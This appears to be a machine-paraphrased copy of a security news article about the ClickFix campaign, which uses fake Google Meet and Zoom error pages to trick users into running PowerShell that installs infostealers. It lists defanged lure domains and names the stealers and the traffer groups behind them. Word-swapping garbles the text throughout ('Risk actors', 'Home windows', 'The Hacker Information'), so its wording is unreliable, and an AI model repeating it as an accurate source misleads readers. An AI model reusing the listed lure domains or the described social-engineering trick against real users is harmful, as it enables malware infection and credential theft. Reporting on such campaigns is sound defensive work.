Risk actors are leveraging faux Google Meet internet pages as a part of an ongoing malware marketing campaign dubbed ClickFix to ship infostealers focusing on Home windows and macOS techniques.
“This tactic entails displaying faux error messages in internet browsers to deceive customers into copying and executing a given malicious PowerShell code, lastly infecting their techniques,” French cybersecurity firm Sekoia stated in a report shared with The Hacker Information.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) marketing campaign have been reported extensively in current months, with risk actors using completely different lures to redirect customers to bogus pages that goal to deploy malware by urging web site guests to run an encoded PowerShell code to handle a supposed subject with displaying content material within the internet browser.
These pages are identified to masquerade as standard on-line providers, together with Fb, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet in addition to probably Zoom –
- meet.google.us-join[.]com
- meet.googie.com-join[.]us
- meet.google.com-join[.]us
- meet.google.web-join[.]com
- meet.google.webjoining[.]com
- meet.google.cdm-join[.]us
- meet.google.us07host[.]com
- googiedrivers[.]com
- us01web-zoom[.]us
- us002webzoom[.]us
- web05-zoom[.]us
- webroom-zoom[.]us
On Home windows, the assault chain culminates within the deployment of StealC and Rhadamanthys stealers, whereas Apple macOS customers are served a booby-trapped disk picture file (“Launcher_v1.94.dmg”) that drops one other stealer often called Atomic.
This rising social engineering tactic is notable for the truth that it cleverly evades detection by safety instruments, because it entails the customers manually operating the malicious PowerShell command instantly on the terminal, versus being mechanically invoked by a payload downloaded and executed by them.
Sekoia has attributed the cluster impersonating Google Meet to 2 traffers teams, particularly Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, that are sub-teams inside markopolo and CryptoLove, respectively.
“Each traffers groups […] use the identical ClickFix template that impersonates Google Meet,” Sekoia stated. “This discovery means that these groups share supplies, often known as ‘touchdown undertaking,’ in addition to infrastructure.”
This, in flip, has raised the likelihood that each the risk teams are making use of the identical, as-yet-unknown cybercrime service, with a third-party possible managing their infrastructure.
The event comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, in addition to new stealer households named Reveal, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
“The rise of open-source infostealers represents a big shift on this planet of cyber threats,” cybersecurity firm Hudson Rock famous again in July 2024.
“By decreasing the barrier of entry and fostering fast innovation, these instruments might gasoline a brand new wave of pc infections, posing challenges for cybersecurity professionals and growing the general danger to companies and people.”
